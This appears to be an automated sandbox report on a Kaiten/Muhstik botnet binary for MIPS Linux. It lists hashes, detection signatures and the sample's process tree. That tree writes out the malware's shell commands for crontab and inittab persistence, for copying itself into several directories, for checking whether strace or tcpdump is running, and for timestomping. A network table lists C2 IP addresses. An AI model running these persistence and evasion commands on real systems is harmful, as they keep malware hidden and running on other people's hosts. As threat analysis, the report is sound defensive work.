Malware Analysis Report

2024-11-13 17:34

Sample ID 220314-gmgy8affbn
Target 4aa80ec9c4af1849fb3f0c82cf82c99b
SHA256 4817893f8e724cbc5186e17f46d316223b7683dcbc9643e364b5913f8d2a9197
Tags
persistence suricata kaiten
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4817893f8e724cbc5186e17f46d316223b7683dcbc9643e364b5913f8d2a9197

Threat Level: Known bad

The file 4aa80ec9c4af1849fb3f0c82cf82c99b was found to be: Known bad.

Malicious Activity Summary

persistence suricata kaiten

Kaiten family

suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

Identified Kaiten Bot

Writes file to system bin folder

Modifies rc script

Write file to user bin folder

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-14 05:55

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-14 05:55

Reported

2022-03-14 05:57

Platform

debian9-mipsbe-en-20211208

Max time kernel

0s

Max time network

120s

Command Line

[./4aa80ec9c4af1849fb3f0c82cf82c99b]

Signatures

suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

suricata

Writes file to system bin folder

Description Indicator Process Target
/bin/crontab /bin/crontab N/A N/A
/bin/nvram /bin/nvram N/A N/A
/bin/uname /bin/uname N/A N/A

Modifies rc script

persistence
Description Indicator Process Target
/etc/rc.local /etc/rc.local ./4aa80ec9c4af1849fb3f0c82cf82c99b N/A

Write file to user bin folder

Description Indicator Process Target
/usr/bin/crontab /usr/bin/crontab N/A N/A
/usr/sbin/nvram /usr/sbin/nvram N/A N/A

Reads runtime system information

Description Indicator Process Target
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
/tmp/.bawtz /tmp/.bawtz ./4aa80ec9c4af1849fb3f0c82cf82c99b N/A
/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /bin/cp N/A
/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /bin/cp N/A
/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /bin/cp N/A
/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /bin/cp N/A

Processes

./4aa80ec9c4af1849fb3f0c82cf82c99b

[./4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c pidof -x strace > /dev/null]

/bin/pidof

[pidof -x strace]

/bin/sh

[sh -c pidof -x tcpdump > /dev/null]

/bin/pidof

[pidof -x tcpdump]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -r]

/bin/sh

[sh -c crontab -l | grep /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/bin/grep

[grep /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/cat

[cat /etc/inittab]

/usr/bin/crontab

[crontab -r]

/bin/grep

[grep -v /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/cp

[cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab -]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/cp

[cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v no cron]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c echo "0:2345:respawn:/var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/cp

[cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/bin/grep

[grep /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v no cron]

/bin/cat

[cat /etc/inittab]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c echo "0:2345:respawn:/var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/cp

[cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/run/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v no cron]

/bin/grep

[grep /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c echo "0:2345:respawn:/var/run/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

Network

Country Destination Domain Proto
US 85.120.225.141:8080 tcp
SG 185.201.8.176:8080 tcp
US 144.172.71.162:8080 tcp
RO 89.33.194.89:8080 tcp
SG 156.67.218.115:8080 tcp
SG 156.67.218.115:8080 tcp
SG 156.67.218.115:8080 tcp
SG 37.44.244.106:8080 tcp

Files

N/A